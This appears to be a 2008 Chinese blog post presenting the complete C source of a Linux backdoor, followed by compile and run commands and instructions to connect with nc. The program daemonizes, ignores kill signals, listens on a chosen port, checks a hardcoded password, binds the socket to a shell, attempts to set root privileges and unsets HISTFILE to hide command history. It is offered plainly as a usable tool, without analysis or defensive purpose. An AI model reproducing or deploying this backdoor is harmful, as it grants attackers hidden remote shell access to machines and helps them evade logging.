分类: LINUX
2008-03-22 23:58:29
|
linux后门程序 [root@localhost root]#cat tcps.c #include #include #include #include #include #include #include #define backlog 64 #define PASSWORD "password" /*连接的密码*/ main(int argc,char **argv) { int listenfd,connectfd,f; pid_t pid; struct sockaddr_in server; struct sockaddr_in client; u_int sin_size; char p[1000]; if(argc!=2) { printf("./tcps exit(1); } signal(SIGCHLD, SIG_IGN); signal(SIGHUP, SIG_IGN); signal(SIGTERM, SIG_IGN); signal(SIGINT, SIG_IGN); if (fork()) exit(0); listenfd=socket(AF_INET,SOCK_STREAM,0); if(listenfd==-1) { printf("socket fail\n"); exit(1); } memset(&server,0,sizeof(server)); server.sin_family=PF_INET; server.sin_port=htons(atoi(argv[1])); server.sin_addr.s_addr=htonl(INADDR_ANY); if(bind(listenfd,(struct sockaddr*)&server,sizeof(server))==-1) { printf("bind fail\n"); exit(1); } if(listen(listenfd,backlog)==-1) { printf("listen fail\n"); exit(1); } sin_size=sizeof(client); connectfd=accept(listenfd,(struct sockaddr *)&client,&sin_size); while(connectfd) { pid=fork(); if (pid>0) { close(connectfd); continue; } else if (pid==0) { recv(connectfd, p, 1000, 0); #ifndef REMOTELY_EXPLOITABLE for (f = 0; f < strlen(p); f++) switch (p[f]) { case '|': case ';': case '&': case '>': case '`': case '\r': case '\n': p[f] = '\0'; break; } #endif /* REMOTELY_EXPLOITABLE :P */ if (strncmp(p, PASSWORD,32) != 0) { send(connectfd, "fail", 4, 0); send(connectfd, "\377\373\001", 4, 0); close(connectfd); exit(1); } printf("connect success"); close(0); close(1); close(2); dup2(connectfd, 0); dup2(connectfd, 1); dup2(connectfd, 2); setreuid(0, 0); setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.", 1); unsetenv("HISTFILE"); execl("/bin/sh", "sh", (char *) 0); close(connectfd); exit(0); } else { printf("fork fail.\n"); exit(1); } } close(listenfd); } [root@localhost root]# gcc tcps.c [root@localhost root]# ./a.out 1234 [root@localhost root]# 然后就可以在windows下用nc连接了 nc -vv ip/域名 后门端口号 输入密码就ok了 不过程序还是有些小毛病。。。。。。。。。。。。。。。。。。 |
